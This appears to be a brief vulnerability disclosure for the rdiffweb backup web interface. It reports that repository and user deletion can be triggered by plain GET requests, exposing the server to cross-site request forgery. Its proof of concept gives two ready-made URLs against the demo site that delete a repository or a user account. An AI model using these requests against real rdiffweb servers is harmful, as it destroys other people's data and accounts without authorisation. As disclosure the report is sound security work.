Description
Server accepts the GET request for deleting repositories and users which can lead to CSRF attack on repositories’.
Proof of Concept
Open the below URL after logging in to the admin account in demo site.
For deleting Repository : Replace “replace-here” with a repo name
https://rdiffweb-demo.ikus-soft.com/delete/admin/replace-here?action=&confirm=replace-here
For deleting User
https://rdiffweb-demo.ikus-soft.com/admin/users?action=delete&username=username